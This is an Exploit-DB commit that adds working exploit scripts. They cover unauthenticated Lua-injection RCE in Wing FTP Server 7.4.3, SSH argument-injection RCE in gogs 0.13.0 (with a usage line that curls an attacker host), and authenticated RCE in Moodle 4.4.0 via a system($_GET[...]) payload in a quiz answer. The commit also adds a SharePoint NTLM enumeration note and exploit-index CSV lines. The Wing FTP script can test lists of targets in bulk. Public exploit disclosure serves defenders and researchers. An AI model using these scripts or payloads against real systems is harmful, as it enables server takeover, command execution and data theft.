DB: 2025-07-03

5 changes to exploits/shellcodes/ghdb

gogs 0.13.0 - Remote Code Execution (RCE)

Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution  (RCE)

Moodle 4.4.0 - Authenticated Remote Code Execution

Microsoft SharePoint 2019 - NTLM Authentication
This commit is contained in:
Exploit-DB 2025-07-03 00:16:29 +00:00
parent 97a1ee1350
commit 83f6bce1ba
5 changed files with 696 additions and 0 deletions

179
exploits/multiple/remote/52347.py Executable file
View file

@ -0,0 +1,179 @@
# Exploit Title: Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
# CVE: CVE-2025-47812
# Date: 2025-06-30
# Exploit Author: Sheikh Mohammad Hasan aka 4m3rr0r (https://github.com/4m3rr0r)
# Vendor Homepage: https://www.wftpserver.com/
# Version: Wing FTP Server <= 7.4.3
# Tested on: Linux (Root Privileges), Windows (SYSTEM Privileges)
# Description:
# Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE)
# flaw (CVE-2025-47812). This vulnerability arises from improper handling of NULL bytes in the 'username'
# parameter during login, leading to Lua code injection into session files. These maliciously crafted
# session files are subsequently executed when authenticated functionalities (e.g., /dir.html) are accessed,
# resulting in arbitrary command execution on the server with elevated privileges (root on Linux, SYSTEM on Windows).
# The exploit leverages a discrepancy between the string processing in c_CheckUser() (which truncates at NULL)
# and the session creation logic (which uses the full unsanitized username).
# Proof-of-Concept (Python):
# The provided Python script automates the exploitation process.
# It injects a NULL byte followed by Lua code into the username during a POST request to loginok.html.
# Upon successful authentication (even anonymous), a UID cookie is returned.
# A subsequent GET request to dir.html using this UID cookie triggers the execution of the injected Lua code,
# leading to RCE.
import requests
import re
import argparse
# ANSI color codes
RED = "\033[91m"
GREEN = "\033[92m"
RESET = "\033[0m"
def print_green(text):
print(f"{GREEN}{text}{RESET}")
def print_red(text):
print(f"{RED}{text}{RESET}")
def run_exploit(target_url, command, username="anonymous", verbose=False):
login_url = f"{target_url}/loginok.html"
login_headers = {
"Host": target_url.split('//')[1].split('/')[0],
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": target_url,
"Connection": "keep-alive",
"Referer": f"{target_url}/login.html?lang=english",
"Cookie": "client_lang=english",
"Upgrade-Insecure-Requests": "1",
"Priority": "u=0, i"
}
from urllib.parse import quote
encoded_username = quote(username)
payload = (
f"username={encoded_username}%00]]%0dlocal+h+%3d+io.popen(\"{command}\")%0dlocal+r+%3d+h%3aread(\"*a\")"
"%0dh%3aclose()%0dprint(r)%0d--&password="
)
if verbose:
print_green(f"[+] Sending POST request to {login_url} with command: '{command}' and username: '{username}'")
try:
login_response = requests.post(login_url, headers=login_headers, data=payload, timeout=10)
login_response.raise_for_status()
except requests.exceptions.RequestException as e:
print_red(f"[-] Error sending POST request to {login_url}: {e}")
return False
set_cookie = login_response.headers.get("Set-Cookie", "")
match = re.search(r'UID=([^;]+)', set_cookie)
if not match:
print_red("[-] UID not found in Set-Cookie. Exploit might have failed or response format changed.")
return False
uid = match.group(1)
if verbose:
print_green(f"[+] UID extracted: {uid}")
dir_url = f"{target_url}/dir.html"
dir_headers = {
"Host": login_headers["Host"],
"User-Agent": login_headers["User-Agent"],
"Accept": login_headers["Accept"],
"Accept-Language": login_headers["Accept-Language"],
"Accept-Encoding": login_headers["Accept-Encoding"],
"Connection": "keep-alive",
"Cookie": f"UID={uid}",
"Upgrade-Insecure-Requests": "1",
"Priority": "u=0, i"
}
if verbose:
print_green(f"[+] Sending GET request to {dir_url} with UID: {uid}")
try:
dir_response = requests.get(dir_url, headers=dir_headers, timeout=10)
dir_response.raise_for_status()
except requests.exceptions.RequestException as e:
print_red(f"[-] Error sending GET request to {dir_url}: {e}")
return False
body = dir_response.text
clean_output = re.split(r'<\?xml', body)[0].strip()
if verbose:
print_green("\n--- Command Output ---")
print(clean_output)
print_green("----------------------")
else:
if clean_output:
print_green(f"[+] {target_url} is vulnerable!")
else:
print_red(f"[-] {target_url} is NOT vulnerable.")
return bool(clean_output)
def main():
parser = argparse.ArgumentParser(description="Exploit script for command injection via login.html.")
parser.add_argument("-u", "--url", type=str,
help="Target URL (e.g., http://192.168.134.130). Required if -f not specified.")
parser.add_argument("-f", "--file", type=str,
help="File containing list of target URLs (one per line).")
parser.add_argument("-c", "--command", type=str,
help="Custom command to execute. Default: whoami. If specified, verbose output is enabled automatically.")
parser.add_argument("-v", "--verbose", action="store_true",
help="Show full command output (verbose mode). Ignored if -c is used since verbose is auto-enabled.")
parser.add_argument("-o", "--output", type=str,
help="File to save vulnerable URLs.")
parser.add_argument("-U", "--username", type=str, default="anonymous",
help="Username to use in the exploit payload. Default: anonymous")
args = parser.parse_args()
if not args.url and not args.file:
parser.error("Either -u/--url or -f/--file must be specified.")
command_to_use = args.command if args.command else "whoami"
verbose_mode = True if args.command else args.verbose
vulnerable_sites = []
targets = []
if args.file:
try:
with open(args.file, 'r') as f:
targets = [line.strip() for line in f if line.strip()]
except Exception as e:
print_red(f"[-] Could not read target file '{args.file}': {e}")
return
else:
targets = [args.url]
for target in targets:
print(f"\n[*] Testing target: {target}")
is_vulnerable = run_exploit(target, command_to_use, username=args.username, verbose=verbose_mode)
if is_vulnerable:
vulnerable_sites.append(target)
if args.output and vulnerable_sites:
try:
with open(args.output, 'w') as out_file:
for site in vulnerable_sites:
out_file.write(site + "\n")
print_green(f"\n[+] Vulnerable sites saved to: {args.output}")
except Exception as e:
print_red(f"[-] Could not write to output file '{args.output}': {e}")
if __name__ == "__main__":
main()

194
exploits/multiple/remote/52348.py Executable file
View file

@ -0,0 +1,194 @@
# Exploit Title: gogs 0.13.0 - Remote Code Execution (RCE)
# Date: 27th June, 2025
# Exploit Author: Ardayfio Samuel Nii Aryee
# Software link: https://github.com/gogs/gogs.git
# Version: gogs <=0.13.0
# Tested on: Ubuntu
# CVE: CVE-2024-39930
# ===============================
# Example Usage:
# python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub "touch /tmp/pwned"
# python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub "curl http://atacker.com" --ssh-port 2222
# ===============================
import requests
import paramiko
import base64
import random
import string
import sys
import argparse
from urllib.parse import urlparse
API_BASE_URL = ""
def generate_random_string(length=8, charset=None):
if charset is None:
charset = string.ascii_letters + string.digits
return ''.join(random.choices(charset, k=length))
def make_headers(token=None, basic_auth=None):
headers = {"Content-Type": "application/json"}
if token:
headers["Authorization"] = f"token {token}"
elif basic_auth:
b64 = base64.b64encode(basic_auth.encode()).decode()
headers["Authorization"] = f"Basic {b64}"
return headers
def http_post(path, json=None, headers=None):
url = f"{API_BASE_URL}{path}"
response = requests.post(url, json=json, headers=headers)
response.raise_for_status()
return response
def http_get(path, headers=None):
url = f"{API_BASE_URL}{path}"
response = requests.get(url, headers=headers)
response.raise_for_status()
return response
def http_delete(path, headers=None):
url = f"{API_BASE_URL}{path}"
response = requests.delete(url, headers=headers)
response.raise_for_status()
return response
def obtain_api_token(username, password):
auth = f"{username}:{password}"
headers = make_headers(basic_auth=auth)
data = {"name": generate_random_string()}
try:
response = http_post(f"/users/{username}/tokens", json=data, headers=headers)
token = response.json()['sha1']
print(f"[+] API Token Acquired: {token}")
return token
except Exception as e:
print(f"[!] Failed to obtain API token: {e}")
sys.exit(1)
def create_repo(token):
repo_name = generate_random_string()
headers = make_headers(token=token)
data = {
"name": repo_name,
"description": "Auto-created repository",
"private": False
}
try:
response = http_post("/user/repos", json=data, headers=headers)
full_name = response.json()['full_name']
print(f"[+] Repository Created: {full_name}")
return full_name
except Exception as e:
print(f"[!] Failed to create repository: {e}")
sys.exit(1)
def delete_existing_ssh_keys(token):
headers = make_headers(token=token)
try:
response = http_get("/user/keys", headers=headers)
keys = response.json()
for key in keys:
key_id = key['id']
http_delete(f"/user/keys/{key_id}", headers=headers)
print(f"[+] Deleted SSH Key ID: {key_id}")
except Exception as e:
print(f"[!] Failed to delete existing SSH keys: {e}")
sys.exit(1)
def add_ssh_key(public_key_path, token):
delete_existing_ssh_keys(token)
try:
with open(public_key_path, 'r') as f:
key = f.read()
except Exception as e:
print(f"[!] Failed to read public key file: {e}")
sys.exit(1)
headers = make_headers(token=token)
data = {
"title": generate_random_string(),
"key": key
}
try:
response = http_post("/user/keys", json=data, headers=headers)
print(f"[+] SSH Key Added: {response.status_code}")
except Exception as e:
print(f"[!] Failed to add SSH key: {e}")
sys.exit(1)
def exploit(ssh_user, ssh_host, ssh_port, private_key_path, repo_path, command):
try:
key = paramiko.RSAKey.from_private_key_file(private_key_path)
except Exception as e:
print(f"[!] Failed to load SSH key: {e}")
sys.exit(1)
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname=ssh_host, port=int(ssh_port), username=ssh_user, pkey=key)
session = client.get_transport().open_session()
print("[+] Executing command...... ")
session.set_environment_variable("--split-string", command)
session.exec_command(f"git-upload-pack {repo_path}")
stdout = session.makefile('rb', 1024)
stderr = session.makefile_stderr('rb', 1024)
print("STDERR:", stderr.read().decode())
print("STDOUT:", stdout.read().decode())
session.close()
client.close()
except Exception as e:
print(f"[!] Error: {e}")
sys.exit(1)
def main():
global API_BASE_URL
parser = argparse.ArgumentParser(description="Exploit Gogs SSH argument injection (CVE-2024-39930)")
parser.add_argument("url", help="Gogs application URL (e.g., http://skillforge.lab:3000)")
parser.add_argument("auth", help="Gogs credentials in the format username:password")
parser.add_argument("private_key", help="Path to private SSH key")
parser.add_argument("public_key", help="Path to public SSH key")
parser.add_argument("command", help="Command to execute remotely")
parser.add_argument("--ssh-port", type=int, default=None, help="Optional: custom SSH port to use")
args = parser.parse_args()
parsed_url = urlparse(args.url)
API_BASE_URL = f"{parsed_url.scheme}://{parsed_url.netloc}/api/v1"
ssh_host = parsed_url.hostname
ssh_port = args.ssh_port if args.ssh_port else (parsed_url.port or 22)
try:
username, password = args.auth.split(":")
except ValueError:
print("[!] Invalid format for auth argument")
sys.exit(1)
token = obtain_api_token(username, password)
repo_path = create_repo(token)
add_ssh_key(args.public_key, token)
exploit(
ssh_user=username,
ssh_host=ssh_host,
ssh_port=ssh_port,
private_key_path=args.private_key,
repo_path=repo_path,
command=args.command
)
if __name__ == "__main__":
main()

View file

@ -0,0 +1,262 @@
# Exploit Title: Moodle 4.4.0 - Authenticated Remote Code Execution
# Exploit Author: Likhith Appalaneni
# Vendor Homepage: https://moodle.org
# Software Link: https://github.com/moodle/moodle/releases/tag/v4.4.0
# Tested Version: Moodle 4.4.0
# Affected versions: 4.4 to 4.4.1, 4.3 to 4.3.5, 4.2 to 4.2.8, 4.1 to 4.1.11
# Tested On: Ubuntu 22.04, Apache2, PHP 8.2
# CVE: CVE-2024-43425
# References:
# - https://github.com/aninfosec/CVE-2024-43425-Poc
# - https://nvd.nist.gov/vuln/detail/CVE-2024-43425
import argparse
import requests
import re
import sys
import subprocess
from bs4 import BeautifulSoup
import urllib.parse
requests.packages.urllib3.disable_warnings()
def get_login_token(session, login_url):
print("[*] Step 1: GET /login/index.php to extract login token")
try:
response = session.get(login_url, verify=False)
if response.status_code != 200:
print(f"[-] Unexpected status code {response.status_code} when accessing login page")
sys.exit(1)
except Exception as e:
print(f"[-] Error connecting to {login_url}: {e}")
sys.exit(1)
soup = BeautifulSoup(response.text, "html.parser")
token_input = soup.find("input", {"name": "logintoken"})
if not token_input or not token_input.get("value"):
print("[-] Failed to extract login token from HTML")
sys.exit(1)
token = token_input["value"]
print(f"[+] Found login token: {token}")
return token
def perform_login(session, login_url, username, password, token):
print("[*] Step 2: POST /login/index.php with credentials")
login_payload = {
"anchor": "",
"logintoken": token,
"username": username,
"password": password,
}
try:
response = session.post(
login_url,
data=login_payload,
headers={"Content-Type": "application/x-www-form-urlencoded"},
verify=False,
)
if response.status_code not in [200, 303]:
print(f"[-] Unexpected response code during login: {response.status_code}")
sys.exit(1)
except Exception as e:
print(f"[-] Login POST failed: {e}")
sys.exit(1)
if "MoodleSession" not in session.cookies.get_dict():
print("[-] Login may have failed: MoodleSession cookie missing")
sys.exit(1)
print("[+] Logged in successfully.")
def get_quiz_info(session, base_url, cmid):
print("[*] Extracting sesskey, courseContextId, and category from quiz edit page...")
quiz_edit_url = f"{base_url}/mod/quiz/edit.php?cmid={cmid}"
try:
resp = session.get(quiz_edit_url, verify=False)
if resp.status_code != 200:
print(f"[-] Failed to load quiz edit page. Status: {resp.status_code}")
sys.exit(1)
# Extract sesskey
sesskey_match = re.search(r'"sesskey":"([a-zA-Z0-9]+)"', resp.text)
# Extract courseContextId
ctxid_match = re.search(r'"courseContextId":(\d+)', resp.text)
# Extract category
category_match = re.search(r';category=(\d+)', resp.text)
if not (sesskey_match and ctxid_match and category_match):
print("[-] Could not extract sesskey, courseContextId, or category")
print(resp.text[:1000])
sys.exit(1)
sesskey = sesskey_match.group(1)
ctxid = ctxid_match.group(1)
category = category_match.group(1)
print(f"[+] Found sesskey: {sesskey}")
print(f"[+] Found courseContextId: {ctxid}")
print(f"[+] Found category: {category}")
return sesskey, ctxid, category
except Exception as e:
print(f"[-] Exception while extracting quiz info: {e}")
sys.exit(1)
def upload_calculated_question(session, base_url, sesskey, cmid, courseid, category, ctxid):
print("[*] Step 3: Uploading calculated question with payload...")
url = f"{base_url}/question/bank/editquestion/question.php"
payload = "(1)->{system($_GET[chr(97)])}"
post_data = {
"initialcategory": 1,
"reload": 1,
"shuffleanswers": 1,
"answernumbering": "abc",
"mform_isexpanded_id_answerhdr": 1,
"noanswers": 1,
"nounits": 1,
"numhints": 2,
"synchronize": "",
"wizard": "datasetdefinitions",
"id": "",
"inpopup": 0,
"cmid": cmid,
"courseid": courseid,
"returnurl": f"/mod/quiz/edit.php?cmid={cmid}&addonpage=0",
"mdlscrollto": 0,
"appendqnumstring": "addquestion",
"qtype": "calculated",
"makecopy": 0,
"sesskey": sesskey,
"_qf__qtype_calculated_edit_form": 1,
"mform_isexpanded_id_generalheader": 1,
"category": f"{category},{ctxid}",
"name": "exploit",
"questiontext[text]": "<p>test</p>",
"questiontext[format]": 1,
"questiontext[itemid]": 623548580,
"status": "ready",
"defaultmark": 1,
"generalfeedback[text]": "",
"generalfeedback[format]": 1,
"generalfeedback[itemid]": 21978947,
"answer[0]": payload,
"fraction[0]": 1.0,
"tolerance[0]": 0.01,
"tolerancetype[0]": 1,
"correctanswerlength[0]": 2,
"correctanswerformat[0]": 1,
"feedback[0][text]": "",
"feedback[0][format]": 1,
"feedback[0][itemid]": 281384971,
"unitrole": 3,
"penalty": 0.3333333,
"hint[0][text]": "",
"hint[0][format]": 1,
"hint[0][itemid]": 812786292,
"hint[1][text]": "",
"hint[1][format]": 1,
"hint[1][itemid]": 795720000,
"tags": "_qf__force_multiselect_submission",
"submitbutton": "Save changes"
}
try:
res = session.post(url, data=post_data, verify=False, allow_redirects=False)
if res.status_code in [302, 303] and "Location" in res.headers and "&id=" in res.headers["Location"]:
print("[+] Question upload request sent. Extracting question ID from redirect.")
qid = re.search(r"&id=(\d+)", res.headers["Location"])
if not qid:
print("[-] Could not extract question ID from redirect.")
sys.exit(1)
return qid.group(1)
else:
print(f"[-] Upload failed. Status code: {res.status_code}")
sys.exit(1)
except Exception as e:
print(f"[-] Upload exception: {e}")
sys.exit(1)
def post_dataset_wizard(session, base_url, question_id, sesskey, cmid, courseid, category, ctxid):
print("[*] Step 4: Completing dataset wizard with dataset[0]=0")
wizard_url = f"{base_url}/question/bank/editquestion/question.php?wizardnow=datasetdefinitions"
data_payload = {
"id": question_id,
"inpopup": 0,
"cmid": cmid,
"courseid": courseid,
"returnurl": f"/mod/quiz/edit.php?cmid={cmid}&addonpage=0",
"mdlscrollto": 0,
"appendqnumstring": "addquestion",
"category": f"{category},{ctxid}",
"wizard": "datasetitems",
"sesskey": sesskey,
"_qf__question_dataset_dependent_definitions_form": 1,
"dataset[0]": 0,
"synchronize": 0,
"submitbutton": "Next page"
}
try:
res = session.post(wizard_url, data=data_payload, verify=False)
if res.status_code == 200:
print("[+] Dataset wizard POST submitted.")
return False
elif "Exception - system(): Argument #1 ($command) cannot be empty" in res.text:
print("[+] Reached expected error page. Payload is being interpreted.")
return True
else:
print(f"[-] Dataset wizard POST failed with status: {res.status_code}")
return False
except Exception as e:
print(f"[-] Exception during dataset wizard step: {e}")
return False
def trigger_rce(session, base_url, question_id, category, cmid, courseid, cmd):
print("[*] Step 5: Triggering command: {cmd}")
encoded = urllib.parse.quote(cmd)
trigger_url = (
f"{base_url}/question/bank/editquestion/question.php?id={question_id}"
f"&category={category}&cmid={cmid}&courseid={courseid}"
f"&wizardnow=datasetitems&returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D{cmid}%26addonpage%3D0"
f"&appendqnumstring=addquestion&mdlscrollto=0&a={encoded}"
)
try:
resp = session.get(trigger_url, verify=False)
print("[+] Trigger request sent. Output below:\n")
lines = resp.text.splitlines()
output_lines = []
for line in lines:
if "<html" in line.lower():
break
if line.strip():
output_lines.append(line.strip())
print("[+] Command output (top lines):")
print("\n".join(output_lines[:2]) if output_lines else "[!] No output detected.")
except Exception as e:
print(f"[-] Error triggering command: {e}")
sys.exit(1)
def main():
parser = argparse.ArgumentParser(description="Moodle CVE-2024-43425 Exploit")
parser.add_argument("--url", required=True, help="Target Moodle base URL")
parser.add_argument("--username", required=True, help="Moodle username")
parser.add_argument("--password", required=True, help="Moodle password")
parser.add_argument("--courseid", required=True, help="Course ID")
parser.add_argument("--cmid", required=True, help="Course Module ID (Quiz)")
parser.add_argument("--cmd", required=True, help="Command to execute remotely (e.g., 'whoami' or 'cat /flag')")
args = parser.parse_args()
session = requests.Session()
login_url = f"{args.url.rstrip('/')}/login/index.php"
token = get_login_token(session, login_url)
perform_login(session, login_url, args.username, args.password, token)
sesskey, ctxid, category = get_quiz_info(session, args.url.rstrip('/'), args.cmid)
question_id = upload_calculated_question(session, args.url.rstrip('/'), sesskey, args.cmid, args.courseid, category, ctxid)
if not post_dataset_wizard(session, args.url.rstrip('/'), question_id, sesskey, args.cmid, args.courseid, category, ctxid):
sys.exit(1)
trigger_rce(session, args.url.rstrip('/'), question_id, category, args.cmid, args.courseid, args.cmd)
if __name__ == "__main__":
main()

View file

@ -0,0 +1,57 @@
# Titles: Microsoft SharePoint 2019 NTLM Authentication
# Author: nu11secur1ty
# Date: 06/27/25
# Vendor: Microsoft
# Software: https://www.microsoft.com/en-us/download/details.aspx?id=57462
# Reference:
https://www.networkdatapedia.com/post/ntlm-autSharePoint 2019 NTLM Authentication hentication-security-risks-and-how-to-avoid-them-gilad-david-maayan
## Description:
Microsoft SharePoint Central Administration improperly exposes
NTLM-authenticated endpoints to low-privileged or even brute-forced domain
accounts. Once authenticated, an attacker can access the `_api/web`
endpoint, disclosing rich metadata about the SharePoint site, including
user group relationships, workflow configurations, and file system
structures. The vulnerability enables username and password enumeration,
internal structure mapping, and API abuse.
Key issues include:
- NTLM over HTTP (unencrypted)
- No fine-grained access control on `_api/web`
- NTLM error codes act as oracles for credential validation
STATUS: HIGH-CRITICAL Vulnerability
[+]Exploit:
```
# NTLM Authentication + SharePoint Enumeration Tool Usage:
python ntml.py -u http://10.10.0.15:10626 -U 'CORP\spfarm' -P 'p@ssw0rd'
-v
# Success output (highlight):
[+] NTLM Authentication succeeded on http://10.10.0.15:10626/_api/web
# Result: Full SharePoint metadata dump from the Central Admin instance
```
# Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-47166/PoC)
# Time spent:
72:15:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

View file

@ -10988,6 +10988,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
21295,exploits/multiple/remote/21295.txt,"GNUJSP 1.0 - File Disclosure",2002-02-19,"Thomas Springer",remote,multiple,,2002-02-19,2012-09-12,1,CVE-2002-0300;OSVDB-5323,,,,,https://www.securityfocus.com/bid/4125/info
47439,exploits/multiple/remote/47439.txt,"GoAhead 2.5.0 - Host Header Injection",2019-09-30,Ramikan,remote,multiple,,2019-09-30,2019-09-30,0,CVE-2019-16645,,,,,
43877,exploits/multiple/remote/43877.rb,"GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Arbitrary Module Load (Metasploit)",2018-01-24,Metasploit,remote,multiple,,2018-01-24,2018-01-25,1,CVE-2017-17562,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/aae77fc1a47149d43747ad9513e6f778553ab82c/modules/exploits/linux/http/goahead_ldpreload.rb
52348,exploits/multiple/remote/52348.py,"gogs 0.13.0 - Remote Code Execution (RCE)",2025-07-02,cybersploit,remote,multiple,,2025-07-02,2025-07-02,0,CVE-2024-39930,,,,,
33064,exploits/multiple/remote/33064.txt,"Google Chrome 0.3.154 - 'JavaScript:' URI in 'Refresh' Header Cross-Site Scripting",2009-06-03,MustLive,remote,multiple,,2009-06-03,2014-04-28,1,CVE-2009-2352;OSVDB-56478,,,,,https://www.securityfocus.com/bid/35572/info
33123,exploits/multiple/remote/33123.html,"Google Chrome 2.0.172 - 'About:blank' Address Bar URI Spoofing 'About:blank' Address Bar URI Spoofing",2009-06-28,Lostmon,remote,multiple,,2009-06-28,2014-04-30,1,,,,,,https://www.securityfocus.com/bid/35839/info
33124,exploits/multiple/remote/33124.txt,"Google Chrome 2.0.172 - 'chrome://history/' URI Cross-Site Scripting",2009-06-28,"Karn Ganeshen",remote,multiple,,2009-06-28,2014-04-30,1,,,,,,https://www.securityfocus.com/bid/35841/info
@ -11686,6 +11687,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
689,exploits/multiple/remote/689.pl,"wget 1.9 - Directory Traversal",2004-12-15,jjminar,remote,multiple,,2004-12-14,2016-04-19,1,,,,,http://www.exploit-db.comwget-1.9.tar.gz,
31106,exploits/multiple/remote/31106.txt,"WinComLPD Total 3.0.2.623 - Remote Buffer Overflow / Authentication Bypass",2008-02-04,"Luigi Auriemma",remote,multiple,,2008-02-04,2014-01-28,1,CVE-2008-5159;OSVDB-42861,,,,,https://www.securityfocus.com/bid/27614/info
33067,exploits/multiple/remote/33067.txt,"Winds3D Viewer 3 - 'GetURL()' Arbitrary File Download",2009-06-08,"Diego Juarez",remote,multiple,,2009-06-08,2014-05-01,1,CVE-2009-2386;OSVDB-55863,,,,,https://www.securityfocus.com/bid/35595/info
52347,exploits/multiple/remote/52347.py,"Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)",2025-07-02,4m3rr0r,remote,multiple,,2025-07-02,2025-07-02,0,CVE-2025-47812,,,,,
16292,exploits/multiple/remote/16292.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)",2010-11-24,Metasploit,remote,multiple,,2010-11-24,2011-07-15,1,CVE-2010-0304;OSVDB-61987,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwireshark-win32-1.2.0.zip,
31941,exploits/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 - FTP Client 'LIST' Directory Traversal",2008-06-20,"Tan Chew Keong",remote,multiple,,2008-06-20,2014-02-27,1,CVE-2008-2889;OSVDB-46537,,,,,https://www.securityfocus.com/bid/29844/info
19667,exploits/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 - Remote Buffer Overflow",1999-12-09,"Amanda Woodward",remote,multiple,,1999-12-09,2017-11-15,1,CVE-1999-0972;OSVDB-1158,,,,,https://www.securityfocus.com/bid/863/info
@ -12199,6 +12201,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49830,exploits/multiple/webapps/49830.js,"Moeditor 0.2.0 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
49184,exploits/multiple/webapps/49184.txt,"mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting",2020-12-03,"Sagar Banwa",webapps,multiple,,2020-12-03,2020-12-03,0,,,,,,
49582,exploits/multiple/webapps/49582.txt,"Monica 2.19.1 - 'last_name' Stored XSS",2021-02-23,BouSalman,webapps,multiple,,2021-02-23,2021-02-23,0,CVE-2021-27370,,,,,
52350,exploits/multiple/webapps/52350.py,"Moodle 4.4.0 - Authenticated Remote Code Execution",2025-07-02,"Likhith Appalaneni",webapps,multiple,,2025-07-02,2025-07-02,0,CVE-2024-43425,,,,,
51499,exploits/multiple/webapps/51499.txt,"MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)",2023-05-31,tmrswrr,webapps,multiple,,2023-05-31,2023-05-31,0,,,,,,
50518,exploits/multiple/webapps/50518.txt,"Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)",2021-11-12,"Shain Lakin",webapps,multiple,,2021-11-12,2021-11-12,0,,,,,,
9898,exploits/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Path Disclosure",2009-10-29,"Vladimir Vorontsov",webapps,multiple,,2009-10-28,,1,OSVDB-59579,,,,,
@ -44572,6 +44575,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
16373,exploits/windows/remote/16373.rb,"Microsoft Services - 'nwapi32.dll' (MS06-066) (Metasploit)",2010-08-25,Metasploit,remote,windows,,2010-08-25,2011-03-07,1,CVE-2006-4688;OSVDB-30260;MS06-066,"Metasploit Framework (MSF)",,,,
16369,exploits/windows/remote/16369.rb,"Microsoft Services - 'nwwks.dll' (MS06-066) (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-07,1,CVE-2006-4688;OSVDB-30260;MS06-066,"Metasploit Framework (MSF)",,,,
48053,exploits/windows/remote/48053.py,"Microsoft SharePoint - Deserialization Remote Code Execution",2020-01-21,Voulnet,remote,windows,,2020-02-11,2020-02-11,0,CVE-2019-0604,,,,,
52349,exploits/windows/remote/52349.txt,"Microsoft SharePoint 2019 - NTLM Authentication",2025-07-02,nu11secur1ty,remote,windows,,2025-07-02,2025-07-02,0,CVE-2025-47166,,,,,
31632,exploits/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 - Picture Source HTML Injection",2008-04-09,OneIdBeagl3,remote,windows,,2008-04-09,2014-02-13,1,CVE-2008-1888;OSVDB-44459,,,,,https://www.securityfocus.com/bid/28706/info
29951,exploits/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 - Cross-Site Scripting",2007-05-04,Solarius,remote,windows,,2007-05-04,2013-12-01,1,CVE-2007-2581,,,,,https://www.securityfocus.com/bid/23832/info
20305,exploits/windows/remote/20305.txt,"Microsoft Site Server 2.0 with IIS 4.0 - Arbitrary File Upload",1999-01-30,Mnemonix,remote,windows,,1999-01-30,2012-08-07,1,CVE-1999-0360;OSVDB-5884,,,,,https://www.securityfocus.com/bid/1811/info

Can't render this file because it is too large.